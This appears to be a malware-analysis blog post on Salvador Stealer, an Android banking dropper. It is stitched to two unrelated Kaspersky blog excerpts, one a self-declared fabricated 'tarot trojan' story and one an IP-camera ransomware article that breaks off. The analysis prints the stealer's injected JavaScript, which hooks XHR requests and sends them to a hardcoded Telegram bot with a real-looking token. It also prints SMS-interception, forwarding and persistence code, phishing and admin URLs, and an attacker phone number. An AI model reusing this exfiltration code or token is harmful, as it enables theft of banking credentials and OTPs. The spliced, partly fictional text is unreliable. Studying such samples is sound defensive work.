Salvador Stealer: New Android Malware That Phishes Banking Details & OTPs

In this report, we examine an Android malware sample recently collected and analyzed by our team. This malware masquerades as a banking application and is built to steal sensitive user information. During the analysis, we came across internal references to “Salvador,” so we decided to name it Salvador Stealer. 

Real-time visibility into mobile malware behavior is crucial for security teams, SOC analysts, and mobile app providers. This analysis demonstrates how advanced threats can bypass user trust and steal sensitive data, highlighting the need for dynamic malware analysis solutions. 

Salvador Stealer Overview 

The collected malware sample is a dropper that delivers a banking stealer masquerading as a legitimate banking app. Its primary goal is to collect sensitive user information, including: 

  • Registered mobile number 
  • Aadhaar number 
  • PAN card details 
  • Date of birth 
  • Net banking user ID and password 

It embeds a phishing website inside the Android application to trick users into entering their credentials. Once submitted, the stolen data is immediately sent to both the phishing site and a C2 server controlled via Telegram. 

In this technical breakdown, we’ll walk you through how this malware operates, how it maintains persistence, and how it exfiltrates sensitive data in real time. 

Key Takeaways 

  • Multi-Stage Attack Chain: Salvador Stealer uses a two-stage infection process — a dropper APK that installs and launches the actual banking stealer payload. 
  • Phishing-Based Credential Theft: The malware embeds a phishing website within the Android app to collect sensitive personal and banking information, including Aadhaar number, PAN card, and net banking credentials. 
  • Real-Time Data Exfiltration: Stolen credentials are immediately sent to both a phishing server and a Command and Control (C2) server via the Telegram Bot API. 
  • SMS Interception & OTP Theft: Salvador Stealer abuses SMS permissions to capture incoming OTPs and banking verification codes, helping attackers bypass two-factor authentication. 
  • Multiple Exfiltration Channels: The malware forwards stolen SMS data via dynamic SMS forwarding and HTTP POST requests, ensuring data reaches the attacker even if one channel fails. 
  • Persistence Mechanisms: Salvador Stealer automatically restarts itself if stopped and survives device reboots by registering system-level broadcast receivers. 
  • Exposed Infrastructure: During analysis, we found the phishing infrastructure and admin panel publicly accessible, exposing an attacker’s WhatsApp contact, suggesting a possible link to India. 

Malware Behavior Analysis 

To uncover the full behavior of Salvador Stealer and observe its actions in real time, we executed the sample inside ANY.RUN’s new Android sandbox.


Analysis of the Salvador malware inside ANY.RUN Sandbox’s interactive Android VM

This interactive environment allowed us to quickly analyze the malware’s behavior, visualize its activity, and identify key indicators, all while saving significant analysis time. 



Malware Structure 

The malware consists of two key components: 

  • Dropper APK – Installs and triggers the second-stage payload. 
  • Base.apk (Payload) – The actual banking credential stealer responsible for data theft. 

Dropper APK Behavior 

The dropper APK is designed to silently install and execute the malicious payload. To enable this, it declares specific permissions and intent filters in its AndroidManifest.xml, including: 

AndroidManifest.xml

<uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>

And

<intent-filter>
    <action android:name="com.example.android.apis.content.SESSION_API_PACKAGE_INSTALLED" android:exported="true"/>
</intent-filter>

This behavior was clearly observed in our sandbox environment, where the malware launched a new activity immediately after execution. 

The dropper APK designed to install and launch a secondary payload (base.apk) as a new activity

If we open the initial dropper APK using WinRAR, we can see base.apk, which serves as the actual malicious payload. The dropper APK is responsible for dropping and launching this payload without the victim’s knowledge. 

Base.apk displayed inside the initial dropper APK using WinRAR

Once executed, base.apk exhibits several key behaviors: 

  • It establishes a connection to Telegram, which the attackers use as a Command and Control (C2) server to receive stolen data and manage the infection. 
  • It triggers the signature “Starts itself from another location,” confirming that it was dropped and launched by the initial dropper APK rather than being installed directly. 

Process communicating with Telegram revealed inside ANY.RUN Android sandbox

Phishing Interface & Data Theft  

Salvador Stealer tricks users into entering their banking credentials through a phishing page, styled as a banking interface, that is embedded in the app. 

Once the user submits their credentials, the data is immediately sent to both the C2 server and a Telegram bot. 

Step 1: Collecting Personal Information

On the first page, the app prompts the user to enter: 

  • Registered mobile number 
  • Aadhaar number 
  • PAN card details 
  • Date of birth 

The interface of the fake banking app displayed inside ANY.RUN Android sandbox 

Once this information is submitted, it is immediately sent to: 

  • A phishing website controlled by the attacker 
  • A Telegram bot used as part of the malware’s C2 infrastructure 

Stolen data sent to phishing site 

Stolen data sent to Telegram C2 server 

Step 2: Stealing Banking Credentials 

At the next stage, the app asks the user to provide: 

  • Net banking user ID 
  • Password 

Banking credentials provided to cyber attackers 

This data is also exfiltrated to both the phishing server and the Telegram bot. We can see this easily inside ANY.RUN Android sandbox:  

Stolen data sent to phishing site

These credential theft attempts were clearly captured in the HTTP request logs during sandbox analysis.

Stolen data sent to Telegram C2 server

By enabling HTTPS MITM Proxy mode in ANY.RUN’s Android sandbox, we were able to intercept and verify the exfiltration of user data in real time. 

Credential theft attempts captured in the HTTP request logs



Technical Analysis 

The base.apk file embedded in the dropper APK contains the core malicious functionality of Salvador Stealer. Here’s a detailed look at its structure: 

Base.apk file structure

Encrypted Strings & Obfuscation 

We’ll begin by opening one of the Java files to analyze its contents. Let’s start with Earnestine.java.

public class Earnestine extends BroadcastReceiver {
    private static final Map<String, StringBuilder> sdghedy = new ConcurrentHashMap();

    @Override // android.content.BroadcastReceiver
    public void onReceive(Context context, Intent intent) {
        Object[] pdus;
        if (intent.getAction().equals(NPStringFog.decode("0F1E09130108034B021C1F1B080A04154B260B1C0811060E091C5C3D3D3E3E3C2424203B383529")) && (pdus = (Object[]) intent.getExtras().get(NPStringFog.decode("1E141812"))) != null) {
            for (Object pdu : pdus) {
...

We can see that the strings are encrypted using a custom method. The decryption is performed using NPStringFog.decode(…), defined in the NPStringFog.java class.  

Let’s examine that next to understand what type of encryption is used. 

Opening NPStringFog.java, we can confirm that it implements XOR decryption using a static key: “npmanager”. 

package obfuse; 
 
import java.io.ByteArrayOutputStream; 
 
public class NPStringFog { 
    public static String KEY = "npmanager";  // XOR key 
    private static final String hexString = "0123456789ABCDEF";  // Hexadecimal string for conversion 
 
    public static String decode(String str) { 
        ByteArrayOutputStream baos = new ByteArrayOutputStream(str.length() / 2); 
         
        // Convert hex string to byte array 
        for (int i = 0; i < str.length(); i += 2) { 
            baos.write((hexString.indexOf(str.charAt(i)) << 4) | hexString.indexOf(str.charAt(i + 1))); 
        } 
         
        byte[] b = baos.toByteArray(); 
        int len = b.length; 
        int keyLen = KEY.length(); 
         
        // XOR decryption 
        for (int i2 = 0; i2 < len; i2++) { 
            b[i2] = (byte) (b[i2] ^ KEY.charAt(i2 % keyLen));  // XOR byte with key 
        } 
         
        return new String(b); 
    } 
} 

This confirms that the encryption is XOR-based. Using CyberChef, we can manually decode strings like the one found in Earnestine: 

Decoding strings with the help of CyberChef 

CyberChef recipe (From_Hex, then XOR with the Latin1 key "npmanager"; the input is the hex string from Earnestine):

https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')XOR(%7B'option':'Latin1','string':'npmanager'%7D,'Standard',false)&input=MEYxRTA5MTMwMTA4MDM0QjAyMUMxRjFCMDgwQTA0MTU0QjI2MEIxQzA4MTEwNjBFMDkxQzVDM0QzRDNFM0UzQzI0MjQyMDNCMzgzNTI5
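The CyberChef recipe decodes one string at a time. As an added analyst-side check (our own example, not code from the report or from the malware), the Python below reproduces NPStringFog.decode() for the two constants in Earnestine.onReceive and, more usefully, recovers the XOR key from a ciphertext plus a guessed plaintext. That second step is how you confirm a key such as "npmanager" when the decoder class is itself obfuscated or stripped from the sample: XOR-ing ciphertext with the expected Android identifier yields the keystream, and its shortest repeating period is the key. The hex constants are copied from the Earnestine snippet above; the plaintext guess "android.provider.Telephony.SMS_RECEIVED" is the standard broadcast action an SMS receiver listens for, which is what an analyst would try first.

```python
# Added example: validating the NPStringFog XOR scheme and recovering its key from a known plaintext.
# The two hex constants are the ones passed to NPStringFog.decode() in Earnestine.onReceive.
SMS_ACTION_HEX = ("0F1E09130108034B021C1F1B080A04154B260B1C0811060E091C5C"
                  "3D3D3E3E3C2424203B383529")
PDUS_HEX = "1E141812"
KEY = "npmanager"  # static key found in NPStringFog.java


def xor_decode(hex_ct: str, key: str) -> str:
    """Reproduce NPStringFog.decode(): hex -> bytes, then XOR each byte with the repeating key."""
    data = bytes.fromhex(hex_ct)
    return bytes(c ^ ord(key[i % len(key)]) for i, c in enumerate(data)).decode("latin-1")


def recover_key(hex_ct: str, known_plaintext: str) -> str:
    """Known-plaintext recovery for a repeating-key XOR.

    ciphertext XOR plaintext == keystream; the key is the keystream's shortest period.
    A plaintext prefix is enough as long as it spans at least two key repetitions.
    """
    data = bytes.fromhex(hex_ct)
    stream = bytes(c ^ p for c, p in zip(data, known_plaintext.encode("latin-1")))
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return stream[:period].decode("latin-1")
    return stream.decode("latin-1")  # not reached: period == len(stream) always matches


if __name__ == "__main__":
    # Decode with the key read from NPStringFog.java ...
    print("action:", xor_decode(SMS_ACTION_HEX, KEY))
    print("extra: ", xor_decode(PDUS_HEX, KEY))
    # ... and confirm the same key from a plaintext guess alone.
    print("recovered key:", recover_key(SMS_ACTION_HEX, "android.provider.Telephony.SMS_RECEIVED"))
```

Because the decoded action is exactly the broadcast Earnestine later registers for (android.provider.Telephony.SMS_RECEIVED) and the extra is "pdus", the recovered key matches the static KEY in NPStringFog.java, which is the consistency check you want before trusting a bulk decoding pass over the whole APK.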

To analyze the rest of the APK effectively, we’ll need to decode all encrypted strings automatically. Here’s a Python script that recursively scans all .java files, decrypts any encrypted strings using the same XOR method, and writes the result to a _decoded.java file.

import re
import os

def decode_npstringfog(encoded: str, key: str = "npmanager") -> str:
    # Hex string -> bytes, then XOR each byte with the repeating key (mirrors NPStringFog.decode)
    b = bytearray()
    for i in range(0, len(encoded), 2):
        b.append(int(encoded[i:i+2], 16))
    key_bytes = key.encode()
    return bytearray((b[i] ^ key_bytes[i % len(key_bytes)]) for i in range(len(b))).decode(errors="replace")

def decode_and_save(filepath: str):
    with open(filepath, "r", encoding="utf-8") as f:
        content = f.read()

    # Find all NPStringFog.decode("...") calls. The dot and the parentheses must be escaped:
    # an unescaped "(" opens a capture group, so group(1) would include the quotes and
    # int(..., 16) would fail on the first character.
    pattern = re.compile(r'NPStringFog\.decode\("([0-9A-Fa-f]+)"\)')
    if not pattern.search(content):
        return

    decoded_content = pattern.sub(lambda m: f'"{decode_npstringfog(m.group(1))}"', content)

    outpath = filepath.replace(".java", "_decoded.java")
    with open(outpath, "w", encoding="utf-8") as f:
        f.write(decoded_content)
    print(f"[+] Decoded file written: {outpath}")

def walk_and_decode(base_dir: str = "."):
    for root, _, files in os.walk(base_dir):
        for file in files:
            # Skip output files from a previous run so they are not decoded twice
            if file.endswith(".java") and not file.endswith("_decoded.java"):
                full_path = os.path.join(root, file)
                decode_and_save(full_path)

if __name__ == "__main__":
    walk_and_decode()

WebView-Based Phishing Page 

Now that we’ve decoded the files, we can begin our deeper analysis of base.apk.  

Let’s start with Helene.java, which acts as the main activity of the application. It loads a webpage and handles runtime permissions. 
 
Upon launch, it checks for the necessary Android permissions and ensures there is an active internet connection. 

@Override
public void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_ffff);
    changeStatusBarColor("#4CAF50");
    ...
    if (checkPermissions(this)) {
        WebView webView = (WebView) findViewById(R.id.randomWebView);
        setupWebView(this, webView);
        initiateForegroundServiceIfRequired();
    } else {
        requestAppPermissions();
    }
}

This method sets up the UI, verifies permissions, and initializes a WebView. The setupWebView() method enables JavaScript and DOM storage, then loads the phishing page:

public void setupWebView(Context context, final WebView webView) {
    WebSettings settings = webView.getSettings();
    settings.setJavaScriptEnabled(true);
    settings.setDomStorageEnabled(true);
    ...
    webView.loadUrl("https://t15.muletipushpa.cloud/page/");
}

Once the page finishes loading, a malicious JavaScript payload is injected: 

String jsCode = "eval(decodeURIComponent('%28%66%75%6e%63%74%69.....'));"; 

After decoding, the JavaScript reveals that it hooks XMLHttpRequest.prototype.send, the method web apps commonly use to submit data such as login credentials or session information. 

(function() {
    const originalSend = XMLHttpRequest.prototype.send;
    XMLHttpRequest.prototype.send = function(data) {
        try {
            const botToken = "7931012454:AAGdsBp3w5fSE9PxdrwNUopr3SU86mFQieE";
            const chatId = "-1002480016557";
            const telegramUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;
            const telegramMessage = {
                chat_id: chatId,
                text: `Intercepted Data Sent:\n${data}`
            };
            fetch(telegramUrl, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify(telegramMessage)
            });
        } catch (e) {
            console.error("Error sending to Telegram:", e);
        }
        return originalSend.apply(this, arguments);
    };
})();

It intercepts all AJAX/XHR requests made from the loaded phishing page. These intercepted payloads are sent to a hardcoded Telegram chat via the Bot API. 





SMS Interception & OTP Theft 

After loading the phishing WebView, the app requests several Android permissions, including:  

  • RECEIVE_SMS 
  • SEND_SMS 
  • READ_SMS 
  • INTERNET  

These permissions are essential for the malware’s goals—intercepting one-time passwords (OTPs) and forwarding them. 

Once the permissions are granted, the initiateForegroundServiceIfRequired() method is called, launching the Fitzgerald service. This foreground service creates a fake notification (“Customer support”) and, more importantly, immediately registers a broadcast receiver to intercept incoming SMS: 

this.smsReceiver = new Earnestine();
registerReceiver(this.smsReceiver, new IntentFilter("android.provider.Telephony.SMS_RECEIVED"));

This is the real starting point of the OTP interception process. Every incoming message is captured and parsed by Earnestine. From the PDU, the malware extracts the message body, sender’s number, and timestamp: 

SmsMessage sms = SmsMessage.createFromPdu((byte[]) pdu, "3gpp");
String messageBody = sms.getMessageBody();
String senderId = sms.getOriginatingAddress();
long timestamp = sms.getTimestampMillis();

Data Exfiltration Methods

The message is then stored using a map that groups multipart SMS messages together. Once it decides the message is complete and ready for exfiltration, the malware uses two separate mechanisms to forward it to the attacker: 

  1. Dynamic SMS forwarding:  

Inside a function named Bradford(), the malware contacts a remote server to retrieve a forwarding number. 

String urlString = "https://t15.muletipushpa.cloud/json/number.php";
...
String phoneNumber = jsonObject.optString("number", "");
Earnestine.this.sendSMS(messageBody, phoneNumber);

This number is set by the attacker and can be changed at any time. If the server responds with enabled: true, the message is forwarded to that number using the standard SmsManager. 

smsManager.sendTextMessage(phoneNumber, null, messageBody, null, null); 

If the number is not available or the response is malformed, the malware will fall back to a previously saved one stored in SharedPreferences. It uses the key “Salvador” as the name of the preference file, and “forwardingNumber” as the key to retrieve the last known destination.  

This use of “Salvador” as a unique identifier for internal storage is what led us to name this malware Salvador Stealer: 

SharedPreferences sharedPreferences = context.getSharedPreferences("Salvador", 0);
String savedPhoneNumber = sharedPreferences.getString("forwardingNumber", "");

This suggests the malware is designed to persist attacker-supplied configuration data between sessions, allowing it to continue exfiltrating OTPs even when the server is unreachable or temporarily offline. 

  2. HTTP-Based Fallback 

Through another method called Randall(), the malware constructs a JSON payload containing the sender ID, message content, and timestamp: 

jsonData.put("sender_id", senderId);
jsonData.put("message", messageBody);
jsonData.put("timestamp", timestamp);

This data is then sent in a POST request to another hardcoded endpoint: 

String apiUrl = "https://t15.muletipushpa.cloud/post.php";

By using both SMS and HTTP as parallel delivery channels, the malware increases its chances of reliably delivering OTPs or any sensitive codes it intercepts, ensuring the attacker receives them regardless of connectivity issues or SMS blocking. 
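The three network behaviours described so far (the XHR hook posting to the Telegram Bot API, the number.php lookup, and the post.php fallback) all leave URL-level traces in proxy or sandbox HTTP logs. The Python below is an added example of our own, not code from the report or the malware, that triages such log lines: it flags Telegram Bot API calls, keeps the numeric bot ID for pivoting while redacting the secret half of the token, and matches the tNN.muletipushpa.cloud hosting pattern from the IOC list, labelling the two endpoint paths quoted above. The log lines, the timestamp format and the bot token in them are constructed for the example; only the domain pattern and the paths come from the report.

```python
import re
from typing import Optional

# Constructed sample of sandbox/proxy HTTP log lines: timestamp, method, URL, status.
# The bot token below is a placeholder, not a real Telegram credential.
SAMPLE_LOG = """\
2025-04-01T10:02:11Z POST https://api.telegram.org/bot1234567890:PLACEHOLDER_BOT_TOKEN/sendMessage 200
2025-04-01T10:02:12Z GET https://t15.muletipushpa.cloud/json/number.php 200
2025-04-01T10:02:13Z POST https://t15.muletipushpa.cloud/post.php 200
2025-04-01T10:02:14Z GET https://www.example.com/ 200
"""

# Telegram Bot API URLs embed the credential: /bot<numeric id>:<secret>/<method>
TELEGRAM_BOT_RE = re.compile(r"https?://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)/(\w+)")
# Campaign hosting pattern from the IOC list: t01..t15 and ta01 under muletipushpa.cloud
PHISH_HOST_RE = re.compile(r"https?://(ta?\d{2}\.muletipushpa\.cloud)(/\S*)?", re.IGNORECASE)
# Endpoints the stealer uses for its SMS-forwarding config and its HTTP exfiltration
KNOWN_PATHS = {"/json/number.php": "sms-forwarding-config", "/post.php": "http-exfil"}


def classify(line: str) -> Optional[dict]:
    """Return a finding for one log line, or None when nothing matches."""
    m = TELEGRAM_BOT_RE.search(line)
    if m:
        bot_id, secret, method = m.groups()
        return {
            "kind": "telegram_bot_c2",
            "bot_id": bot_id,                      # safe to share for pivoting/hunting
            "token": f"{bot_id}:{secret[:4]}...",  # never copy the full secret into tickets
            "method": method,
        }
    m = PHISH_HOST_RE.search(line)
    if m:
        host, path = m.group(1).lower(), (m.group(2) or "/")
        return {"kind": "phishing_infra", "host": host, "role": KNOWN_PATHS.get(path, "unknown")}
    return None


def triage(log_text: str) -> list:
    """Run classify() over every line and keep the matching ones with their source line."""
    findings = []
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            hit["line"] = line
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

Run against HTTPS MITM proxy output from the sandbox, the same two rules separate the Telegram C2 traffic (where the bot ID is the pivot value) from the phishing infrastructure, and the role label tells the analyst whether a hit is a config pull or an actual exfiltration of an intercepted message.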

Persistence Mechanism 

Even if the user or system tries to terminate the app’s background service, the malware is programmed to automatically restart it. When the Fitzgerald service is killed or swiped away, it immediately schedules a recovery task using Android’s WorkManager: 

WorkRequest serviceRestartWork = new OneTimeWorkRequest.Builder(Mauricio.class)
    .setInitialDelay(1L, TimeUnit.SECONDS)
    .build();
WorkManager.getInstance(getApplicationContext()).enqueue(serviceRestartWork);

The scheduled worker points to the Mauricio class. Inside, it simply relaunches Fitzgerald: 

Intent Pasquale = new Intent(getApplicationContext(), Fitzgerald.class);
getApplicationContext().startForegroundService(Pasquale);

This way, even if the user tries to shut the app down from the task manager or system settings, the malware silently revives itself within seconds. 

If the device itself is rebooted, the malware still survives. A separate class named Ellsworth is responsible for this behavior. It listens for the system-wide BOOT_COMPLETED broadcast and triggers the Fitzgerald service again: 

public class Ellsworth extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        if (intent.getAction().equals("android.intent.action.BOOT_COMPLETED")) {
            Intent serviceIntent = new Intent(context, (Class<?>) Fitzgerald.class);
            context.startService(serviceIntent);
        }
    }
}

This guarantees that the malware regains control after reboot and resumes intercepting SMS messages immediately. 
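Taken together, the dropper's REQUEST_INSTALL_PACKAGES permission, the SMS permissions requested by base.apk, and the BOOT_COMPLETED receiver form a combination that a static triage pass over AndroidManifest.xml can score before any dynamic analysis. The Python below is an added example of our own (not code from the report) that does exactly that with a small weighted rule set. The manifest it parses is constructed for the example: the package name is made up, and it declares Earnestine statically even though the report shows that receiver being registered at runtime from the Fitzgerald service, so on a real sample the SMS_RECEIVED rule may not fire and the permission rules carry the signal. A legitimate SMS or MDM app can trigger some of these rules too; the score is a prioritisation aid, not a verdict.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest combining the declarations the report discusses: the dropper's
# REQUEST_INSTALL_PACKAGES, base.apk's SMS permissions, an SMS_RECEIVED receiver (Earnestine)
# and the BOOT_COMPLETED receiver (Ellsworth). The package name is invented.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.fakebank">
    <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <application>
        <receiver android:name=".Earnestine" android:exported="true">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <receiver android:name=".Ellsworth" android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
        <service android:name=".Fitzgerald"/>
    </application>
</manifest>
"""

# Constructed control case: an ordinary app that only needs network access.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
    <uses-permission android:name="android.permission.INTERNET"/>
    <application/>
</manifest>
"""

# (rule name, weight, predicate over the manifest summary). Weights are illustrative.
RULES = [
    ("installs_other_apks", 2, lambda s: "android.permission.REQUEST_INSTALL_PACKAGES" in s["permissions"]),
    ("reads_incoming_sms", 2, lambda s: bool({"android.permission.RECEIVE_SMS", "android.permission.READ_SMS"} & s["permissions"])),
    ("can_send_sms", 1, lambda s: "android.permission.SEND_SMS" in s["permissions"]),
    ("sms_received_receiver", 2, lambda s: "android.provider.Telephony.SMS_RECEIVED" in s["receiver_actions"]),
    ("boot_persistence", 1, lambda s: "android.intent.action.BOOT_COMPLETED" in s["receiver_actions"]),
]


def summarize_manifest(xml_text: str) -> dict:
    """Collect declared permissions and the actions each <receiver> listens for."""
    root = ET.fromstring(xml_text)
    permissions = {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}
    receiver_actions = {
        action.get(ANDROID_NS + "name")
        for receiver in root.iter("receiver")
        for action in receiver.iter("action")
    }
    return {"permissions": permissions, "receiver_actions": receiver_actions}


def score_manifest(xml_text: str) -> tuple:
    """Return (total weight of matching rules, names of the rules that matched)."""
    summary = summarize_manifest(xml_text)
    hits = [name for name, _, pred in RULES if pred(summary)]
    score = sum(weight for name, weight, _ in RULES if name in hits)
    return score, hits


if __name__ == "__main__":
    for label, manifest in (("sample", SAMPLE_MANIFEST), ("benign", BENIGN_MANIFEST)):
        print(label, score_manifest(manifest))
```

The summary keeps receiver actions separate from permissions on purpose: RECEIVE_BOOT_COMPLETED alone is common in benign apps, but a BOOT_COMPLETED receiver next to SMS interception permissions is the persistence-plus-theft pairing the report describes, and the rule names in the result tell the reviewer which pairing produced the score.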

Interesting Findings 

During our analysis, we identified that the fake banking interface used by Salvador Stealer is actually a phishing website embedded inside the Android application. 
 
The phishing page can be accessed directly at: 
👉 hxxxs://t15[.]muletipushpa[.]cloud/page/start[.]php 

Phishing page that encourages victims to share their personal data 

We also detected another phishing page hosted on a different subdomain; the subdomains follow a pattern with incremental digits, from t01.* up to t15.*. 

At the time of writing, the attacker has also left the admin panel accessible to anyone. 

The admin login page is publicly available at: 
👉 hxxxs://t15[.]muletipushpa[.]cloud/admin/login[.]php 

Admin login page available to everyone 

Brute-forcing the admin login panel reveals a message prompting the user to contact a WhatsApp number, likely belonging to the developer of this phishing malware. 

hxxxs://api[.]whatsapp[.]com/send/?phone=916306285085&text&type=phone_number&app_absent=0

Exposed phone number: +916306285085 
This suggests that the attacker is either based in India or using an Indian phone number as a disguise. 

Salvador Threat Impact 

The Salvador Stealer campaign poses a serious risk to both individuals and organizations: 

  • For end users: Victims risk financial fraud, identity theft, and unauthorized access to their banking accounts. 
  • For financial institutions: This malware undermines customer trust, increases fraud cases, and may lead to reputational damage. 
  • For security teams: Salvador Stealer’s layered infection chain, real-time data exfiltration, and SMS interception tactics make detection difficult without advanced analysis tools. 
  • For mobile ecosystem: The use of legitimate-looking banking apps and embedded phishing pages highlights the growing trend of sophisticated Android-based social engineering attacks. 

Conclusion 

The analysis of Salvador Stealer reveals how modern Android malware combines phishing, credential theft, and advanced persistence techniques to compromise sensitive financial data. Threats like this highlight the increasing complexity of mobile malware and the growing challenge of detecting and stopping them before damage is done. 

By analyzing Salvador Stealer in real time using ANY.RUN’s Android sandbox, we were able to fully map its behavior, uncover its infrastructure, and extract key indicators in just minutes—something that would otherwise require hours of manual static analysis. 

Here’s how analysis like this can bring value: 

  • Faster threat detection: Quickly identify malicious behaviors and communication patterns. 
  • Complete visibility: Observe real-time actions of mobile malware, including data exfiltration and persistence tactics. 
  • Reduced investigation time: Automate and accelerate the technical analysis process. 
  • Improved response: Provide clear, actionable Indicators of Compromise (IOCs) for threat hunting and incident response. 
  • Enhanced threat intelligence: Expose attacker infrastructure and techniques that may be used in future campaigns. 

Effective defense starts with better visibility. Tools like ANY.RUN’s sandbox make real-time threat analysis actionable and accessible to everyone. 


Indicators of Compromise (IOC) 

🔗 Phishing URLs: 

  • t01[.]muletipushpa[.]cloud 
  • t02[.]muletipushpa[.]cloud 
  • t03[.]muletipushpa[.]cloud 
  • t04[.]muletipushpa[.]cloud 
  • t05[.]muletipushpa[.]cloud 
  • t06[.]muletipushpa[.]cloud 
  • t08[.]muletipushpa[.]cloud 
  • t10[.]muletipushpa[.]cloud 
  • t11[.]muletipushpa[.]cloud 
  • t12[.]muletipushpa[.]cloud 
  • t13[.]muletipushpa[.]cloud 
  • t14[.]muletipushpa[.]cloud 
  • t15[.]muletipushpa[.]cloud 
  • ta01[.]muletipushpa[.]cloud 

📡 C2 Server (Telegram Bot): 

  • hxxs://api[.]telegram[.]org/bot7931012454:AAGdsBp3w5fSE9PxdrwNUopr3SU86mFQieE 

🔍 File Hashes: 

  • INDUSLND_BANK_E_KYC.apk 
    SHA256: 21504D3F2F3C8D8D231575CA25B4E7E0871AD36CA6BBB825BF7F12BFC3B00F5A 
  • Base.apk 
    SHA256: 7950CC61688A5BDDBCE3CB8E7CD6BEC47EEE9E38DA3210098F5A5C20B39FB6D8 

Threat actor’s phone number: 

  • +916306285085 


The post Salvador Stealer: New Android Malware That Phishes Banking Details & OTPs appeared first on ANY.RUN’s Cybersecurity Blog.


Trojan.Arcanum — a new trojan targeting tarot experts, esotericists, and magicians | Kaspersky official blog

Imagine what the world would be like if tarot cards could accurately predict any and every event. Perhaps we could have nipped Operation Triangulation in the bud, and zero-day vulnerabilities wouldn’t exist at all, as software developers would receive alerts in advance thanks to tarot readings.

Sounds incredible? Well, our experts actually looked into similar methods in their latest discovery! Read on to learn about the new Trojan we found and how we did it.

The tarot trojan

The new Trojan — Trojan.Arcanum — is distributed through websites dedicated to fortune-telling and esoteric practices, disguised as a “magic” app for predicting the future. At first glance, it looks like a harmless program offering users the chance to lay out virtual tarot cards, calculate astrological compatibility, or even “charge an amulet with the energy of the universe” (whatever that means). But in reality, something truly mystical is unfolding behind the scenes — in the worst possible way.

Once installed on the user’s device, Trojan.Arcanum connects to a cloud C2 server and deploys its payload — the Autolycus.Hermes stealer, the Karma.Miner miner, and the Lysander.Scytale crypto-malware. Having collected user data (logins; passwords; time, date and place of birth; banking information; etc.), the stealer sends it to the cloud. Then the real drama begins: the Trojan starts manipulating its victim in real life using social engineering!

Through pop-up notifications, Trojan.Arcanum sends pseudo-esoteric advice to the user, prompting them to take certain actions. For example, if the Trojan gains access to the victim’s banking apps and discovers significant funds in the account, the attackers send a command to give the victim a false prediction about the favorability of large investments. After this, the victim might receive a phishing email offering to participate in a “promising startup”. Or maybe they won’t — depending on how the cards fall.

In the meantime, the embedded Karma.Miner begins mining KARMA tokens, and the Trojan activates a paid subscription to dubious “esoteric practices” with monthly charges. If the user detects and terminates the KARMA mining, the crypto-malware randomly shuffles segments of the user’s files without any chance of recovery.

How we discovered Trojan.Arcanum

Typically, we hunt for cyberthreats using complex algorithms and data analysis. But what if the threat is too enigmatic? In such cases, trusting a tarot reading is the best approach. That’s exactly what our experts did. When performing divination on the signature of an unknown virus detected through KSN (Kaspersky Sacral Network), several Major Arcana cards appeared — some of them reversed:

  1. The Emperor — A symbol of power, control, and strategic foresight. Meaning: the threat is serious.
  2. The Magician — Able to spot vulnerabilities where no one else does. Clever, proactive, and decisive, the Magician skillfully manipulates people. In reverse, it warns of a loss of control. Meaning: the attackers use social engineering.
  3. The Horse — Represents a bold, decisive, adventurous individual; a symbol of activity, change… and Trojan horses. Reversed, the card indicates errors due to impulsive actions. Meaning: the threat might disguise itself as a randomly downloaded harmless app.
  4. The Wheel — Warns that insurmountable circumstances are beyond the user’s control, and that a favorable resolution will be delayed. Usually indicates a miner or financial scam.
  5. The Tower — Foretells a phase of change initiated not by the person but by fate — falling upon the person with relentless force. A strong predictor of a zero-click vulnerability.
  6. Death — represents transformation, a change of cycles, an ending, a transition to a new level. Indicates the presence of crypto-malware.

How the reading looked on the expert’s table

How to protect yourself from Arcanum

Protecting yourself from such a virus is nearly impossible — if only because it doesn’t exist. This whole story is a fabrication from start to finish. But what’s stopping it from becoming a reality at any given moment? Trojans and other types of malware do often disguise themselves as legitimate apps and can steal all sorts of data. Miners have long been distributed through links under popular YouTube videos or video games. Ransomware is capable of paralyzing an entire nation’s healthcare insurance system. Moreover, magic themes are certainly popular enough to become a potential target of cybercriminals. Here are some tips to make your digital life safer:


How IP cameras can help attackers | Kaspersky official blog

Cybersecurity professionals will likely draw upon the Akira ransomware attack as a key learning example for years to come. The attackers encrypted an organization’s computers by hacking a surveillance camera. While counterintuitive at first glance, the sequence of events follows a logic that can be easily applied to a different organization and different devices within its infrastructure.

Anatomy of the attack

Attackers exploited a vulnerability in a public-facing application to penetrate the network and execute commands on an infected host. Following the initial breach, they launched the popular remote access tool AnyDesk and initiated an RDP session with the organization’s file server. Accessing the server, they attempted to run ransomware, but the company’s EDR system detected and quarantined it. Alas, this didn’t stop the attackers.

Unable to deploy the ransomware on servers or workstations, which were protected by EDR, the attackers ran a LAN scan and found a network video camera. Despite repeated references to a “webcam” in the incident investigation report, we believe it wasn’t the built-in camera of a laptop or smartphone, but a standalone networked device for video surveillance.

There were several reasons why the camera was an ideal target for the attackers:

